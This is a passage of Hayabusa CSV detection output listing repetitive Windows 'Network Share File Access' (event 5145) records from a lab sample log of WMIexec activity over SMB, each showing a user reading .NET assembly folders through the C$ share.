+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.511 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.526 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.542 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.557 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.557 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.557 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.557 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.573 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.573 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.573 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.573 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.589 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.604 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.604 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.604 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.620 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 